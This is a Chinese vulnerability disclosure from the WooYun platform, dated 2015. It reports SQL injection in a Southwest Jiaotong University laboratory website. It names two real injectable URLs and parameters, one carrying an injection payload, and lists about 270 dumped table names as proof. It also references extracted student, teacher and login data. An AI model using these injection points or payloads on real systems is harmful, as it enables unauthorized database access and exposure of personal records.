当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109207

漏洞标题:西南交通大学国家重点实验室SQL注入

相关厂商:西南交通大学

漏洞作者: harbour_bin

提交时间:2015-04-24 15:43

修复时间:2015-04-29 15:44

公开时间:2015-04-29 15:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

西南交通大学国家重点实验室多处SQL注入(可导致200多个表泄漏,以及身份证、邮箱、手机号、密码等信息泄漏)

详细说明:

西南交通大学国家重点实验室多处SQL注入

1、http://www.tplswjtu.com/WebSite1/detail.aspx?pnodenum=00291202&id=010
2、http://www.tplswjtu.com/website1/ShowPage.aspx?PnodeNum=002902%'%20and%20'%'='
第一个注入点:pnodenum和id
第二个注入点PnodeNum

漏洞证明:

1、注入证明

证明.png


2、可获得270个表,数据量较大

| 2011CGHJ                  |
| 2011FMZL |
| 2011FW |
| 2011HXKT |
| 2011LW |
| 2011RY |
| 2011SB |
| 2011SS |
| 2011XHJF |
| 2011XSHY |
| 2011XSRZ |
| 2011ZJJX |
| 2011ZXKT |
| 2011ZZKF |
| 2011ZZRS |
| 2012BS |
| 2012SB |
| 2013BS |
| 2013SS |
| AcceptPerson |
| AddressManage |
| AllLeaveManage |
| AnnualReport |
| AwardPerson |
| AwardReport |
| AwardReportPerson |
| BackNote |
| BirthdaySend |
| BookPerson |
| BookReport |
| BookReportPerson |
| BuildManage |
| CNASExpReport |
| CNASExperiment |
| CNASFixManage |
| CNASGetExpNo |
| CNASJionFix |
| CNASStaChange |
| CNASStandard |
| CNAS_ChcekFacility |
| CNAS_ChcekFacility_Tmp |
| CNAS_ChcekLevel |
| CNAS_ChcekParam |
| CNAS_ChcekStandard |
| CNAS_ChcekStandard_Tmp |
| CNAS_CheckFac |
| CNAS_CheckPlan |
| CNAS_CheckPlanFac |
| CNAS_CheckPlanFac_Tmp |
| CNAS_CheckThing |
| CNAS_ClientDiscontented |
| CNAS_ClientIdea |
| CNAS_ExpCheckMen |
| CNAS_ExpCheckMen_Tmp |
| CNAS_ExpReport |
| CNAS_ExperimentBrief |
| CNAS_ExperimentFac |
| CNAS_ExperimentFac_Tmp |
| CNAS_ExperimentPlan |
| CNAS_ExperimentStu |
| CNAS_ExperimentStu_Tmp |
| CNAS_ExperimentTea |
| CNAS_ExperimentTear_Tmp |
| CNAS_FacilityAccept |
| CNAS_FacilityInfo |
| CNAS_FacilityPlan |
| CNAS_FacilityRepair |
| CNAS_FacilityRepairPlan |
| CNAS_FacilityScrap |
| CNAS_FileChange |
| CNAS_FileDestroy |
| CNAS_FileDownMen |
| CNAS_FileEdit |
| CNAS_FileManage |
| CNAS_InExamNoReport |
| CNAS_InExamNoWork |
| CNAS_InExamPlan |
| CNAS_InExamReport |
| CNAS_InExamResult |
| CNAS_ManagePlan |
| CNAS_ManageReport |
| CNAS_NewCheckObject |
| CNAS_NewCheckObjectReport |
| CNAS_NoWork |
| CNAS_NoWorkBack |
| CNAS_Person |
| CNAS_PowerCheck |
| CNAS_PowerOver |
| CNAS_QJCheckFac |
| CNAS_ReportBack |
| CNAS_SendUnit |
| CNAS_Soft |
| CNAS_StaChange |
| CNAS_Standard |
| CNAS_TogetherUnit |
| CNAS_Train |
| CNAS_TrainPerson |
| CNAS_TrainPerson_Tmp |
| CNAS_TrainPlan |
| CarApply |
| CarInfo |
| CarMaintain |
| ChangeStuInfo |
| CheapAway |
| CheapBack |
| CheapFix |
| CheapFixBasic |
| ClassInfo |
| ContactApply |
| ContactDatum |
| ContactPerson |
| ContactPlan |
| ContactReceive |
| D99_CMD |
| D99_Tmp |
| DataType |
| Discourse |
| DiscoursePerson |
| DiscourseReport |
| DiscourseReportPerson |
| DoorCardRecord |
| DownLoad |
| English_Person |
| English_ResearchGroup |
| English_SlideImages |
| EnterStu_1 |
| EnterStu_2 |
| ExcelFix |
| ExpertChair |
| ExternalExperts |
| FamillyPerson |
| FieldInfo |
| FitmentChange |
| FitmentManage |
| FixApplyMoney |
| FixBuyApply |
| FixChange |
| FixManage |
| FixOrder |
| FixPlan |
| FixRepair |
| FixRepairApply |
| FixScrap |
| FixUsedManage |
| ForbidSendNode |
| FrameWork |
| FrameWorkOrder |
| FrindLinkA |
| FrindLinkB |
| GJObject |
| GJObjectMoney |
| GJObjectPerson |
| GjHZObject |
| HXObject |
| HXObjectMoney |
| HXObjectPerson |
| HeadshipInfo |
| IfUserApplyInfo |
| InNews |
| InfoShow |
| JobResume |
| JournalshipInfo |
| JudgePerson |
| KFApplyMoney |
| KFBudgetMoney |
| KFObject |
| MainMeet |
| MainObject |
| MeetApply |
| MeetRoom |
| MsgIdCard |
| MyFrameWork |
| MyFrameWorkStep |
| MyView |
| MyWorkMSG |
| OFT_OfficeTestBrief |
| OFT_OfficeTestFac |
| OFT_OfficeTestFac_Tmp |
| OFT_OfficeTestPerson |
| OFT_OfficeTestPerson_Tmp |
| OFT_OfficeTestPlan |
| OFT_OfficeTestReport |
| ObjectForeign |
| OfficeFix |
| OfficeFixChange |
| OnStadyInfo |
| PageLinks |
| PatentPerson |
| PatentReport |
| PatentReportPerson |
| PayMoneyOrder |
| PersonAward |
| PersonBook |
| PersonDiscourse |
| PersonJudge |
| PersonLearn |
| PersonMeet |
| PersonPatent |
| PersonPrize |
| PictureM |
| PlayUserActionInfo |
| PutPayMoney |
| ReportConfig |
| RoomManage |
| S3_Tmp |
| ScholarVister |
| ScienceCBW |
| ScienceHJ |
| ScienceObject |
| ScienceRY |
| ScienceZL |
| SendAllAddress |
| SendAllNote |
| SendNoteNum |
| SendRemindNote |
| SmallNote |
| SpeGradeInfo |
| SpeType |
| SpecialtyInfo |
| StuAward |
| StuDataChange |
| StuDiscourse |
| StuPatent |
| StudentInfo |
| Sys_Part |
| Sys_PartLogin |
| Sys_Popedom |
| Sys_PowerNode |
| TableInfo |
| TableRelation |
| TeachInfo |
| TeacherLeave |
| TempPerson |
| TmpCNASJionFix |
| TmpContactDatum |
| TmpContactPerson |
| TmpContactPlan |
| TmpContactReceive |
| TmpJionPerson |
| TmpObjectPerson |
| UserFinishYear |
| UserLogin |
| V_Object |
| V_ObjectPerson |
| V_UserLogin |
| Vas_Blacklist |
| Web_News |
| WordMessege |
| WorkSeatManage |
| XSRZScience |
| YJPerson |
| YSPerson |
| ZL_DataInfo |
| ZL_LendOrBack |
| ZL_Type |
| ZXObject |
| ZXObjectApply |
| ZXObjectMoney |
| ZXObjectPerson |
| ZXObjectReport |
| ZZApplyMoney |
| ZZBudgetMoney |
| ZZObject |
| dtproperties |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| sqlmapoutput |


3、部分表的数据挖掘

StudentInfo.png


TeachInfo.png


UserLogin.png


修复方案:

你们更专业

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-29 15:44

厂商回复:

最新状态:

暂无